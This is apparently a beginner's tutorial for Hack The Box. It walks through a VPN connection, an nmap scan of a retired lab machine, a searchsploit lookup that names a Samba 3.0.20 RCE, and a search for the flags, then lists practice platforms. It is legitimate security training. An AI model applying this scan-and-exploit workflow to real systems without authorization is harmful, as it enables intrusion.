
Start an Easy Retired Machine

Go to HTB → Machines → filter by Easy + Retired. Start Lame (Linux) or Jerry (Windows). Retired machines have official writeups and IppSec videos — perfect for learning.

2

Connect VPN and Confirm Connectivity

sudo openvpn ~/Downloads/your_pack.ovpn &

ip a show tun0   # should show 10.10.14.x

ping -c 2 10.10.10.X   # confirm target responds

3

Run Your First Nmap Scan

mkdir -p ~/htb/Lame/nmap && cd ~/htb/Lame

nmap -sV -sC -T4 -oN nmap/initial.txt 10.10.10.3

Read every line. Note every service and version. That's your attack surface.

4

Research and Exploit

Search each service+version in searchsploit. For Lame: Samba 3.0.20 has a well-known RCE. Look it up, understand what it does, then exploit it. Aim to understand the vulnerability — not just run the exploit.

5

Find and Submit the Flags

find / -name user.txt 2>/dev/null && find / -name root.txt 2>/dev/null

Copy the flag string and submit it on the HTB machine page. You just hacked your first box. 🎉

6

Write Up What You Did

Even one paragraph. "I scanned, found X, exploited Y, got shell as Z, found flag at W." Writing this cements the learning and builds your personal reference library.

Recommended Beginner Platforms (In Order)

Platform	Why Start Here	Free?	Best For
OverTheWire Bandit	Pure Linux CLI practice, no hacking needed yet	✓ Free	Week 1 — Linux basics
TryHackMe	Fully guided rooms, explain concepts step-by-step	✓ Free tier	Weeks 1-4 — guided learning
HTB Academy	Structured modules with built-in labs, written by HTB	✓ Free tier	Weeks 2-6 — structured path
PortSwigger Web Academy	Best free web hacking labs anywhere, period	✓ Free	Week 4 — web attacks
HackTheBox (Retired)	Real machines with writeups available for reference	✓ Free	Week 3+ — real hacking
PicoCTF	Beginner CTF competitions with hints, great community	✓ Free	Any time — CTF practice
HackTheBox (Active)	Current machines, no writeups, solve solo	✓ Free	Week 6+ — test yourself